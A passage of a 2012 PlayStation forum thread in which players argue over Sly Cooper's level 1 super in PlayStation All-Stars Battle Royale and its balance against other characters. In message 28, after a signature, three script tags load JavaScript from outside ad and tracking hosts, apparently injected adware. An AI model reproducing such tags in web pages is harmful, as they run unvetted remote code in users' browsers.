I Only Post Everything
1169 posts

Re: Lets discuss sly's level 1

[ Edited ]
Dec 4, 2012

@MercenaryDemon I'd argue that Sir Daniel has the fastest starting level 1 in the game but it's awkward hitbox kinda ruins practical uses outside of 1vs1.

Message 21 of 31 (127 Views)
0 Likes
I Only Post Everything
1001 posts

Dec 4, 2012

Dude5059 wrote:

LX_Theo wrote:

Dude5059 wrote:

I can agree with that, I suppose. 

But I can't agree with the statement that he can't dodge supers. Maybe not in the true sense, but I honestly think that Sly is one of the easiest characters to escape a super with, right alongside Drake and Raiden. He can teleport, glide, use his slide, go invisible, he has a lot of options to escape supers.

I mean literally dodge supers. Not just sneak away. How many times has an air dodge or roll evade saved me from dying from a super? So many times. Sly has none of that.

Right, and I understand that. But he definitely has options to get away. They're unsafe, but sometimes those are the best ways of getting away. Take, for example, Drake's Rope Swing, or his Zipline. Those are excellent at getting away from controlled supers. Raiden and Evil Cole's rushing attacks are also really good. Sly has more options to get away without dodging that probably any other character. That can help him a lot. 

Options, sure. But most are not that reliable. Invisible for attacks where they chase you around, and teleport for straight on attacks 9and that only works if you get your reaction time perfect). Again, a Sly in the thick of battle often finds themselves in a bad position. They won't normally get away from other's lvl 1's and such. 

Sly is a character that will falter if he's not playing intelligent an out of the thick of battle. This costs them AP gain. The lvl one itself is a testament to this. Its a ranged attack that is obviously designed for out of the thick. It also is effective enough to keep the lower AP gain viable and still be competitive. Its a very fine line to tow when adjusting it. The lvl one is Sly's main weapon, and a significant change could make the character largely ineffective.

I suggest the larger window to interrupt because it doesn't change the character's effectiveness, only punishes those who try to use it in the thick of battle where it shouldn't be as effective

Message 22 of 31 (125 Views)
0 Likes
Uncharted Territory
1622 posts

Dec 4, 2012
His level 1 is fine. I seriously can't understand all the trouble with it. If I know where he is I can jump over it or roll just out if the way depending on how close he is. His level 1 has to be one of the supers I dodge the most.
Message 23 of 31 (124 Views)
0 Likes
First Son
30 posts

Dec 4, 2012
it is quite hard to interupt... and yes tends to kill you even after you hit sly out of it x.x
Message 24 of 31 (117 Views)
0 Likes
Gaming Beast
1776 posts

[ Edited ]
Dec 4, 2012

mac102991 wrote:

Considering Kratos, Sweet Tooth, Sir Dan, Heiachi, Sackboy, and Raiden can all combo into their supers with ease, I'd say Sly's super is not OP. I would rather have a guarenteed hit than a good chance at one.

Except Level 1 Supers aren't supposed to be guaranteed hits. They're supposed to be hard to land with or without any type of setup, but Sly's is just way too good. 

And since SuperBot has said that they don't want Level 1's to be easily combo'd into, it's only a matter of time before they fix that too.

Message 25 of 31 (112 Views)
0 Likes
I Only Post Everything
1169 posts

Dec 4, 2012
Tell that to half the cast capable of comboing into them multiple ways where as the only thing Sly's has going for it is that Murray is unstoppable.
Message 26 of 31 (109 Views)
0 Likes
Uncharted Territory
1660 posts

Dec 4, 2012

CalDW19940 wrote:
Tell that to half the cast capable of comboing into them multiple ways where as the only thing Sly's has going for it is that Murray is unstoppable.

I literally just said it could be combo'd into 4 different ways, 2 of which are pretty reliable. 

Also, LX Theo, I'm actually agreeing with you on that part. That's why I haven't really brought it up. I was merely elaborating on a topic. You guys make Sly sound useless when it comes to dodging supers, though that's not really true at all. 

------------------------------------------------
Fresh to death
Message 27 of 31 (93 Views)
0 Likes
Gaming Beast
2167 posts

Dec 4, 2012
"Except Level 1 Supers aren't supposed to be guaranteed hits. They're supposed to be hard to land with or without any type of setup, but Sly's is just way too good.

And since SuperBot has said that they don't want Level 1's to be easily combo'd into, it's only a matter of time before they fix that too."

In that case they're going to have to remake the entire game, because almost every character has a way to combo into their super, though some are more reliable than others.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 28 of 31 (87 Views)
0 Likes
Survivor
2179 posts

Dec 4, 2012

LX_Theo wrote:

Just saying this, I saw you in SlyFoxHound's PSASBR Online featuring Nova series (Episode 8) Smiley Very Happy Consider yourself famous.. 

Message 29 of 31 (85 Views)
0 Likes
I Only Post Everything
1169 posts

Dec 4, 2012
@Dude5059 Even if that is the case Sly lacks heavily in approach options due to lacking a block or dodge which invisibity won't protect him from.

Fat Princess is a character who has amazing approaches AND is able to combo into her super but some characters may only have one or the other. Sir Daniel has combos into his super but lacks some good approaches, Toro has some good approaches but not very practical combos into his super.
Message 30 of 31 (74 Views)
0 Likes